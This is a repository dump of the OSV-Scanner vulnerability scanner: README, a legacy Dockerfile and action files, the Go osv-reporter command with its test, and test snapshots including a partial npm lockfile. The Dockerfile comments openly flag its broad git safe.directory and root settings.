OSV-Scanner uses the extensible [OSV-Scalibr](https://github.com/google/osv-scalibr) library under the hood to provide this functionality. If a language or package manager is not supported currently, please file a [feature request.](https://github.com/google/osv-scanner/issues) #### Underlying database The underlying database, [OSV.dev](https://osv.dev/) has several benefits in comparison with closed source advisory databases and scanners: - Covering most open source language and OS ecosystems (including [Git](https://osv.dev/list?q=&ecosystem=GIT)), it’s comprehensive. - Each advisory comes from an open and authoritative source (e.g. [GitHub Security Advisories](https://github.com/github/advisory-database), [RustSec Advisory Database](https://github.com/rustsec/advisory-db), [Ubuntu security notices](https://github.com/canonical/ubuntu-security-notices/tree/main/osv)) - Anyone can suggest improvements to advisories, resulting in a very high quality database. - The OSV format unambiguously stores information about affected versions in a machine-readable format that precisely maps onto a developer’s list of packages The above all results in accurate and actionable vulnerability notifications, which reduces the time needed to resolve them. Check out [OSV.dev](https://osv.dev/) for more details! ## Basic installation To install OSV-Scanner, please refer to the [installation section](https://google.github.io/osv-scanner/installation) of our documentation. OSV-Scanner releases can be found on the [releases page](https://github.com/google/osv-scanner/releases) of the GitHub repository. The recommended method is to download a prebuilt binary for your platform. Alternatively, you can use `go install github.com/google/osv-scanner/v2/cmd/osv-scanner@latest` to build it from source. ## Key Features For more information, please read our [detailed documentation](https://google.github.io/osv-scanner) to learn how to use OSV-Scanner. 
For detailed information about each feature, click their titles in this README. Please note: These are the instructions for the latest OSV-Scanner V2 beta. If you are using V1, check out the V1 [README](https://github.com/google/osv-scanner-v1) and [documentation](https://google.github.io/osv-scanner-v1/) instead. ### [Scanning a source directory](https://google.github.io/osv-scanner/usage) ```bash $ osv-scanner scan source -r /path/to/your/dir ``` This command will recursively scan the specified directory for any supported package files, such as `package.json`, `go.mod`, `pom.xml`, etc. and output any discovered vulnerabilities. OSV-Scanner has the option of using call analysis to determine if a vulnerable function is actually being used in the project, resulting in fewer false positives and more actionable alerts. OSV-Scanner can also detect vendored C/C++ code for vulnerability scanning. See [here](https://google.github.io/osv-scanner/usage/#cc-scanning) for details. #### Supported Lockfiles OSV-Scanner supports 11+ language ecosystems and 19+ lockfile types. To check if your ecosystem is covered, please check out our [detailed documentation](https://google.github.io/osv-scanner/supported-languages-and-lockfiles/#supported-lockfiles). ### [Container Scanning](https://google.github.io/osv-scanner/usage/scan-image) OSV-Scanner also supports comprehensive, layer-aware scanning for container images to detect vulnerabilities in the following operating system packages and language-specific dependencies. | Distro Support | Language Artifacts Support | | -------------- | -------------------------- | | Alpine OS | Go | | Debian | Java | | Ubuntu | Node | | | Python | See the [full documentation](https://google.github.io/osv-scanner/supported-languages-and-lockfiles/#supported-artifacts) for details on support.
**Usage**: ```bash $ osv-scanner scan image my-image-name:tag ``` ![screencast of html output of container scanning](https://github.com/user-attachments/assets/8bb95366-27ec-45d1-86ed-e42890f2fb46) ### [License Scanning](https://google.github.io/osv-scanner/usage/license-scanning/) Check your dependencies' licenses using deps.dev data. For a summary: ```bash osv-scanner --licenses path/to/repository ``` To check against an allowed license list (SPDX format): ```bash osv-scanner --licenses="MIT,Apache-2.0" path/to/directory ``` ### [Offline Scanning](https://google.github.io/osv-scanner/usage/offline-mode/) Scan your project against a local OSV database. No network connection is required after the initial database download. The database can also be manually downloaded. ```bash osv-scanner --offline --download-offline-databases ./path/to/your/dir ``` ### [Guided Remediation](https://google.github.io/osv-scanner/experimental/guided-remediation/) (Experimental) OSV-Scanner provides guided remediation, a feature that suggests package version upgrades based on criteria such as dependency depth, minimum severity, fix strategy, and return on investment. 
We currently support remediating vulnerabilities in the following files: | Ecosystem | File Format (Type) | Supported Remediation Strategies | | :-------- | :----------------------------- | :---------------------------------------------------------------------------------------------------------------- | | npm | `package-lock.json` (lockfile) | [`in-place`](https://google.github.io/osv-scanner/experimental/guided-remediation/#in-place-lockfile-remediation) | | npm | `package.json` (manifest) | [`relock`](https://google.github.io/osv-scanner/experimental/guided-remediation/#in-place-lockfile-remediation) | | Maven | `pom.xml` (manifest) | [`override`](https://google.github.io/osv-scanner/experimental/guided-remediation/#override-dependency-versions) | This is available as a headless CLI command, as well as an interactive mode. #### Example (for npm) ```bash $ osv-scanner fix \ --max-depth=3 \ --min-severity=5 \ --ignore-dev \ --strategy=in-place \ -L path/to/package-lock.json ``` #### Interactive mode (for npm) ```bash $ osv-scanner fix \ -M path/to/package.json \ -L path/to/package-lock.json ``` Screenshot of the interactive relock results screen with some relaxation patches selected ## Data Sources and Privacy OSV-Scanner communicates with the following external services during operation: ### [OSV.dev API](https://osv.dev/) The primary data source for vulnerability information. OSV-Scanner queries this API to check packages for known vulnerabilities and to identify vendored C/C++ dependencies. Data sent includes package names, versions, ecosystems, and file hashes. Use [`--offline` mode](https://google.github.io/osv-scanner/usage/offline-mode/) to disable network requests and scan against a local database instead. 
### [deps.dev API](https://docs.deps.dev/api/) Used for supplementary package information: - **Dependency resolution**: Resolves dependency graphs for vulnerability scanning and remediation - **Container image scanning**: Queries container image metadata for vulnerability detection - **License scanning** (`--licenses` flag): Retrieves license information for packages - **Package deprecation**: Checks if packages are deprecated Data sent includes package names, versions, and ecosystems. No source code is transmitted. ### Package Registries When using native registry for dependency resolution (instead of deps.dev), OSV-Scanner may query: | Registry | URL | Used For | | ------------- | ------------------------------ | ------------------------------------ | | Maven Central | `repo.maven.apache.org/maven2` | Maven package metadata and POM files | | npm Registry | `registry.npmjs.org` | npm package metadata | | PyPI | `pypi.org` | Python package metadata | ## Contribute ### Report Problems If you have what looks like a bug, please use the [GitHub issue tracking system](https://github.com/google/osv-scanner/issues). Before you file an issue, please search existing issues to see if your issue is already covered. ### Contributing code to `osv-scanner` See [CONTRIBUTING.md](CONTRIBUTING.md) for documentation on how to contribute code. ## Star History [![Star History Chart](https://api.star-history.com/svg?repos=google/osv-scanner&type=Date)](https://www.star-history.com/#google/osv-scanner&Date) ================================================ FILE: action.dockerfile ================================================ # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# WARNING, this workflow is for legacy purposes. To view the current workflow see: https://github.com/google/osv-scanner-action

# Build stage. The base image is referenced by tag AND digest, so a re-pushed
# tag cannot change what gets built; the digest has to be bumped deliberately
# to pick up base-image fixes.
FROM golang:1.26.1-alpine3.23@sha256:2389ebfa5b7f43eeafbd6be0c3700cc46690ef842ad962f6c5bd6be49ed82039

RUN mkdir /src
WORKDIR /src

# Copy only the module files first so the dependency download is its own layer.
COPY ./go.mod /src/go.mod
COPY ./go.sum /src/go.sum
RUN go mod download

# Copy the rest of the source and build both binaries.
COPY ./ /src/
RUN go build -o osv-scanner ./cmd/osv-scanner/
RUN go build -o osv-reporter ./cmd/osv-reporter/

# Runtime stage, also pinned by digest.
FROM alpine:3.23@sha256:25109184c71bdad752c8312a8623239686a9a2071e8825f20acb8f2198c3f659
RUN apk --no-cache add \
    ca-certificates \
    git \
    bash

# Allow git to run on mounted directories
# Security note: the '*' value turns off git's repository-ownership check for
# every path inside this image, not only the mounted workspace. Git will then
# honour the configuration of whatever repository it is pointed at, so this
# image should only be run against checkouts whose .git contents are trusted.
# Listing the specific mount path instead of '*' would be the narrower setting.
RUN git config --global --add safe.directory '*'

# NOTE(review): no USER instruction is set in this stage, so the binaries
# presumably run as the image's default user (root) — confirm this is intended.
WORKDIR /root/
COPY --from=0 /src/osv-scanner ./
COPY --from=0 /src/osv-reporter ./
COPY ./exit_code_redirect.sh ./

ENV PATH="${PATH}:/root"

# NOTE(review): with `bash -c <string>`, arguments appended by the action become
# $0, $1, ... of the inline command; the string below does not pass them on to
# exit_code_redirect.sh. Presumably acceptable for this legacy image, or the
# script obtains its input another way — confirm.
ENTRYPOINT [ "bash", "-c", "echo 'WARNING, this workflow is for legacy purposes. To view the current workflow see: https://github.com/google/osv-scanner-action' && /root/exit_code_redirect.sh" ]

================================================
FILE: actions/reporter/action.yml
================================================
# Currently experimental.
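name: "osv-scanner-reporter"
description: "Specialized reporting of scanner results for github actions"
inputs:
  scan-args:
    description: "Arguments to osv-scanner, separated by new line"
    required: true
runs:
  using: "docker"
  image: "../../action.dockerfile"
  entrypoint: /root/osv-reporter
  args:
    - "${{ inputs.scan-args }}"

================================================
FILE: actions/scanner/action.yml
================================================
# Currently experimental.
# WARNING, this workflow is for legacy purposes. To view the current workflow see: https://github.com/google/osv-scanner-action

name: "osv-scanner"
description: "Scans your directory against the OSV database (Experimental)"
inputs:
  scan-args:
    description: "Arguments to osv-scanner, separated by new line"
    default: |-
      --recursive
      ./
runs:
  using: "docker"
  image: "../../action.dockerfile"
  args:
    - ${{ inputs.scan-args }}

================================================
FILE: cmd/osv-reporter/main.go
================================================
// Package main implements the osv-reporter command, which generates GitHub Action
// output for OSV scanner results.
package main

import (
	"context"
	"errors"
	"fmt"
	"io"
	"log/slog"
	"os"
	"strings"

	"github.com/google/osv-scanner/v2/internal/ci"
	"github.com/google/osv-scanner/v2/internal/cmdlogger"
	"github.com/google/osv-scanner/v2/internal/reporter"
	"github.com/google/osv-scanner/v2/internal/version"
	"github.com/google/osv-scanner/v2/pkg/models"
	"github.com/google/osv-scanner/v2/pkg/osvscanner"
	"github.com/urfave/cli/v3"
	"golang.org/x/term"
)

var (
	// Update this variable when doing a release
	commit = "n/a"
	date   = "n/a"
)

// splitLastArg splits the last argument on newlines and returns a new slice
// holding the earlier arguments followed by the split elements.
//
// The GitHub action passes the multi-line `scan-args` input as one argument;
// this turns it back into one element per line. An empty slice is returned
// unchanged instead of panicking on the index, and the result is built in a
// fresh slice so the caller's backing array is never overwritten.
func splitLastArg(args []string) []string {
	if len(args) == 0 {
		return args
	}

	last := len(args) - 1
	parts := strings.Split(args[last], "\n")

	out := make([]string, 0, last+len(parts))
	out = append(out, args[:last]...)
	out = append(out, parts...)

	return out
}

// run executes the reporter CLI with the given arguments and writers and
// returns the process exit code:
//
//	0   success, nothing to fail on
//	1   new called vulnerabilities were found and fail-on-vuln is in effect
//	127 an error was logged and no more specific code applies
//	128 no package sources were found
//	130 the configuration was reported invalid (takes priority over the rest)
func run(args []string, stdout, stderr io.Writer) int {
	logger := cmdlogger.New(stdout, stderr)
	slog.SetDefault(slog.New(logger))

	// Allow multiple arguments to be defined by github actions by splitting the last argument
	// by new lines.
	args = splitLastArg(args)

	cli.VersionPrinter = func(cmd *cli.Command) {
		cmdlogger.Infof("osv-scanner version: %s", cmd.Version)
		cmdlogger.Infof("commit: %s", commit)
		cmdlogger.Infof("built at: %s", date)
	}

	app := &cli.Command{
		Name:        "osv-scanner-action-reporter",
		Version:     version.OSVVersion,
		Usage:       "(Experimental) generates github action output",
		Description: "(Experimental) Used specifically to generate github action output ",
		Suggest:     true,
		Writer:      stdout,
		ErrWriter:   stderr,
		Flags: []cli.Flag{
			&cli.StringFlag{
				Name:        "old",
				Usage:       "the old osv json output",
				TakesFile:   true,
				Required:    false,
				DefaultText: "",
			},
			&cli.StringFlag{
				Name:      "new",
				Usage:     "the new osv json output",
				TakesFile: true,
				Required:  true,
			},
			&cli.StringSliceFlag{
				Name: "output-files",
				Usage: "used to save files to various formats (--output-files=[format]:[path],[format]:[path]...).\n" +
					"See available formats in osv-scanner (default output 'sarif').\n" +
					"In output paths, there are two special options to output to terminal - '#stdout' and '#stderr'.",
				TakesFile: true,
			},
			&cli.StringSliceFlag{
				Name:      "output",
				Usage:     "[DEPRECATED] (Use \"--output-files\" instead)",
				TakesFile: true,
				Action: func(_ context.Context, _ *cli.Command, _ []string) error {
					cmdlogger.Warnf("Warning: --output has been deprecated in favor of --output-files")

					return nil
				},
			},
			&cli.BoolFlag{
				Name:  "gh-annotations",
				Usage: "[DEPRECATED] (Use `--output-files=gh-annotations:#stderr`) prints github action annotations",
			},
			&cli.BoolFlag{
				Name:        "fail-on-vuln",
				Usage:       "whether to return 1 when vulnerabilities are found",
				DefaultText: "true",
			},
			&cli.BoolFlag{
				Name:  "all-vulns",
				Usage: "show all vulnerabilities including unimportant and uncalled ones",
			},
		},
		Action: func(_ context.Context, cmd *cli.Command) error {
			var termWidth int
			var err error
			if stdoutAsFile, ok := stdout.(*os.File); ok {
				termWidth, _, err = term.GetSize(int(stdoutAsFile.Fd()))
				if err != nil { // If output is not a terminal,
					termWidth = 0
				}
			}

			oldPath := cmd.String("old")
			newPath := cmd.String("new")

			oldVulns := models.VulnerabilityResults{}
			if oldPath != "" {
				oldVulns, err = ci.LoadVulnResults(oldPath)
				if err != nil {
					cmdlogger.Warnf("failed to open old results at %s: %v - likely because target branch has no lockfiles.", oldPath, err)
					// Do not return, assume there is no oldVulns (which will display all new vulns).
					oldVulns = models.VulnerabilityResults{}
				}
			}

			// A new-results file that cannot be loaded is treated as empty, so the
			// reporter exits without failing on vulnerabilities in that case.
			newVulns, err := ci.LoadVulnResults(newPath)
			if err != nil {
				cmdlogger.Warnf("failed to open new results at %s: %v - likely because previous step failed.", newPath, err)
				newVulns = models.VulnerabilityResults{}
				// Do not return a non zero error code.
			}

			var diffVulns models.VulnerabilityResults

			diffVulnOccurrences := ci.DiffVulnerabilityResultsByOccurrences(oldVulns, newVulns)
			if len(diffVulnOccurrences) == 0 {
				// There are actually no new vulns, no need to do full diff
				//
				// Since `DiffVulnerabilityResultsByUniqueVulnCount` does not account for Source or Package,
				// this actually changes the results in some cases, e.g.
				//
				// When a lockfile is moved, `DiffVulnerabilityResults` will report the moved lockfile as having
				// a new vulnerability if the existing lockfile has a vulnerability. However this check will
				// report no vulnerabilities. This is desired behavior.
				//
				// NOTE(review): the function named above differs from the one called here
				// (`DiffVulnerabilityResultsByOccurrences`); presumably the same diff is meant — confirm.
				//
				// TODO: This will need to be not empty when we change osv-scanner to report all packages
				diffVulns = models.VulnerabilityResults{}
			} else {
				// TODO: This will need to contain all scanned packages when we change osv-scanner to report all packages
				diffVulns = ci.DiffVulnerabilityResults(oldVulns, newVulns)
			}

			showAllVulns := cmd.Bool("all-vulns")
			stdoutTaken := false

			outputPaths := cmd.StringSlice("output-files")
			if len(outputPaths) == 0 {
				outputPaths = cmd.StringSlice("output")
			}

			for _, outputPath := range outputPaths {
				format := "sarif"
				// Parses strings like: "markdown:./output-path.md
				if preColon, postColon, found := strings.Cut(outputPath, ":"); found {
					format, outputPath = preColon, postColon
				}

				var writer io.Writer
				var outFile *os.File
				switch outputPath {
				case "#stdout":
					writer = stdout
					stdoutTaken = true
				case "#stderr":
					// NOTE(review): this also marks stdout as taken, which suppresses the
					// default table on stdout below — confirm this is intended.
					writer = stderr
					stdoutTaken = true
				default:
					// The path is taken as-is from the command line (in the Docker action,
					// from the workflow's `scan-args` input). os.Create truncates an existing
					// file at that path with this process's privileges.
					created, errCreate := os.Create(outputPath)
					if errCreate != nil {
						return fmt.Errorf("failed to create output file: %w", errCreate)
					}
					outFile = created
					writer = created
				}

				// File and stream outputs are rendered without a terminal width. The reset
				// is kept on the shared variable, as before, so it also applies to any
				// later print in this function.
				termWidth = 0
				errPrint := reporter.PrintResult(&diffVulns, format, writer, termWidth, showAllVulns)

				// Close files we opened ourselves so the handle is released and a failed
				// flush is reported rather than lost; stdout/stderr are left open.
				if outFile != nil {
					if errClose := outFile.Close(); errClose != nil && errPrint == nil {
						errPrint = errClose
					}
				}
				if errPrint != nil {
					return fmt.Errorf("failed to write output: %w", errPrint)
				}
			}

			if !stdoutTaken {
				if errPrint := reporter.PrintResult(&diffVulns, "table", stdout, termWidth, showAllVulns); errPrint != nil {
					return fmt.Errorf("failed to write output: %w", errPrint)
				}
			}

			if cmd.Bool("gh-annotations") {
				if errPrint := reporter.PrintResult(&diffVulns, "gh-annotations", stderr, termWidth, showAllVulns); errPrint != nil {
					return fmt.Errorf("failed to write output: %w", errPrint)
				}
			}

			// Default to true, only false when explicitly set to false
			failOnVuln := !cmd.IsSet("fail-on-vuln") || cmd.Bool("fail-on-vuln")

			// Check whether at least one reported vulnerability is called; results
			// where nothing is called do not fail the run.
			anyIsCalled := false
			for _, vuln := range diffVulns.Flatten() {
				if vuln.GroupInfo.IsCalled() {
					anyIsCalled = true
					break
				}
			}

			// if vulnerability exists it should return error
			if len(diffVulns.Results) > 0 && failOnVuln && anyIsCalled {
				return osvscanner.ErrVulnerabilitiesFound
			}

			return nil
		},
	}

	err := app.Run(context.Background(), args)

	// if the config is invalid, it's possible that is why any other errors
	// happened so that exit code takes priority
	if logger.HasErroredBecauseInvalidConfig() {
		return 130
	}

	if err != nil {
		if errors.Is(err, osvscanner.ErrVulnerabilitiesFound) {
			return 1
		}

		if errors.Is(err, osvscanner.ErrNoPackagesFound) {
			cmdlogger.Errorf("No package sources found, --help for usage information.")
			return 128
		}

		cmdlogger.Errorf("%v", err)
	}

	// if we've been told to print an error, and not already exited with
	// a specific error code, then exit with a generic non-zero code
	if logger.HasErrored() {
		return 127
	}

	return 0
}

// main hands the process arguments and standard streams to run and exits with
// the code it returns.
func main() {
	os.Exit(run(os.Args, os.Stdout, os.Stderr))
}

================================================
FILE: cmd/osv-reporter/main_test.go
================================================
package main

import (
	"reflect"
	"testing"
)

// Test_splitLastArg checks that only the final argument is split on newlines
// and that an empty argument list is passed through.
func Test_splitLastArg(t *testing.T) {
	t.Parallel()

	tests := []struct {
		name string
		args []string
		want []string
	}{
		{
			args: []string{
				"--test1",
				"--test2",
				"--test3\n--test4\n--test5",
			},
			want: []string{
				"--test1",
				"--test2",
				"--test3",
				"--test4",
				"--test5",
			},
		},
		{
			name: "last_arg_without_newline",
			args: []string{"--test1", "--test2"},
			want: []string{"--test1", "--test2"},
		},
		{
			name: "empty_args",
			args: []string{},
			want: []string{},
		},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			t.Parallel()
			if got := splitLastArg(tt.args); !reflect.DeepEqual(got, tt.want) {
				t.Errorf("splitLastArg() = %v, want %v", got, tt.want)
			}
		})
	}
}

================================================
FILE: cmd/osv-scanner/__snapshots__/main_test.snap
================================================
[Test_run/#00 - 1] NAME: osv-scanner scan - scans projects and container images for dependencies, and checks them against the OSV database. USAGE: osv-scanner scan [command [command options]] DESCRIPTION: scans projects and container images for dependencies, and checks them against the OSV database. COMMANDS: source scans a source project's dependencies for known vulnerabilities using the OSV database.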
image detects vulnerabilities in a container image's dependencies, pulling the image if it's not found locally OPTIONS: --help, -h show help --- [Test_run/#00 - 2] --- [Test_run/#01 - 1] NAME: osv-scanner scan - scans projects and container images for dependencies, and checks them against the OSV database. USAGE: osv-scanner scan [command [command options]] DESCRIPTION: scans projects and container images for dependencies, and checks them against the OSV database. COMMANDS: source scans a source project's dependencies for known vulnerabilities using the OSV database. image detects vulnerabilities in a container image's dependencies, pulling the image if it's not found locally OPTIONS: --help, -h show help --- [Test_run/#01 - 2] --- [Test_run/version - 1] osv-scanner version: 2.3.4 osv-scalibr version: 0.4.5 commit: n/a built at: n/a --- [Test_run/version - 2] --- [Test_run_SubCommands/scan_with_a_flag - 1] Scanning dir ./testdata/locks-one-with-nested Scanned /testdata/locks-one-with-nested/nested/composer.lock file and found 1 package Scanned /testdata/locks-one-with-nested/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [Test_run_SubCommands/scan_with_a_flag - 2] Warning: `scan` exists as both a subcommand of OSV-Scanner and as a file on the filesystem. `scan` is assumed to be a subcommand here. If you intended for `scan` to be an argument to `scan`, you must specify `scan scan` in your command line. --- [Test_run_SubCommands/with_no_subcommand - 1] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
No issues found --- [Test_run_SubCommands/with_no_subcommand - 2] --- [Test_run_SubCommands/with_scan_subcommand - 1] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [Test_run_SubCommands/with_scan_subcommand - 2] Warning: `scan` exists as both a subcommand of OSV-Scanner and as a file on the filesystem. `scan` is assumed to be a subcommand here. If you intended for `scan` to be an argument to `scan`, you must specify `scan scan` in your command line. --- ================================================ FILE: cmd/osv-scanner/fix/__snapshots__/command_test.snap ================================================ [TestCommand/errors_when_in_place_used_without_lockfile - 1] --- [TestCommand/errors_when_in_place_used_without_lockfile - 2] in-place strategy requires lockfile --- [TestCommand/errors_when_in_place_used_without_lockfile - 3] { "name": "osv-fix", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo /"Error: no test specified/" && exit 1" }, "author": "", "license": "ISC", "dependencies": { "npm-registry-client": "6.2.0" } } --- [TestCommand/errors_when_override_used_without_manifest - 1] --- [TestCommand/errors_when_override_used_without_manifest - 2] override strategy requires manifest file --- [TestCommand/errors_when_override_used_without_manifest - 3] { "name": "osv-fix", "version": "1.0.0", "lockfileVersion": 2, "requires": true, "packages": { "": { "name": "osv-fix", "version": "1.0.0", "license": "ISC", "dependencies": { "npm-registry-client": "^6.2.0" } }, "node_modules/ajv": { "version": "6.12.6", "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", 
"dependencies": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" }, "funding": { "type": "github", "url": "https://github.com/sponsors/epoberezkin" } }, "node_modules/ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "optional": true, "engines": { "node": ">=8" } }, "node_modules/aproba": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", "optional": true }, "node_modules/are-we-there-yet": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-4.0.2.tgz", "integrity": "sha512-ncSWAawFhKMJDTdoAeOV+jyW1VCMj5QIAwULIBV0SSR7B/RLPPEQiknKcg/RIIZlUQrxELpsxMiTUoAQ4sIUyg==", "optional": true, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/asn1": { "version": "0.2.6", "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", "dependencies": { "safer-buffer": "~2.1.0" } }, "node_modules/assert-plus": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", "engines": { "node": ">=0.8" } }, "node_modules/asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, "node_modules/aws-sign2": { "version": "0.7.0", "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", 
"integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==", "engines": { "node": "*" } }, "node_modules/aws4": { "version": "1.12.0", "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" }, "node_modules/balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" }, "node_modules/bcrypt-pbkdf": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", "dependencies": { "tweetnacl": "^0.14.3" } }, "node_modules/brace-expansion": { "version": "1.1.11", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", "dependencies": { "balanced-match": "^1.0.0", "concat-map": "0.0.1" } }, "node_modules/caseless": { "version": "0.12.0", "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" }, "node_modules/chownr": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/chownr/-/chownr-0.0.2.tgz", "integrity": "sha512-4sa7ZJ+/DavveVRsu49tUbYvLn5cS75w8gLQr14jXlFxSNbuoY7G6gPjcVfgdQ+c4BW02b0hXV5nOXYFD7Fmpw==" }, "node_modules/color-support": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", "optional": true, "bin": { "color-support": "bin.js" } }, 
"node_modules/combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "dependencies": { "delayed-stream": "~1.0.0" }, "engines": { "node": ">= 0.8" } }, "node_modules/concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" }, "node_modules/concat-stream": { "version": "1.5.0", "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-1.5.0.tgz", "integrity": "sha512-litEocitzYgqQ0IPaoLw+tCHcVcJJYW05+SAhH+LS9qutSC7iuejvawts3cUYQycZbRbLsjG8mCJLQi2KX5kEw==", "engines": [ "node >= 0.8" ], "dependencies": { "inherits": "~2.0.1", "readable-stream": "~2.0.0", "typedarray": "~0.0.5" } }, "node_modules/console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", "optional": true }, "node_modules/core-util-is": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" }, "node_modules/dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", "dependencies": { "assert-plus": "^1.0.0" }, "engines": { "node": ">=0.10" } }, "node_modules/delayed-stream": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": 
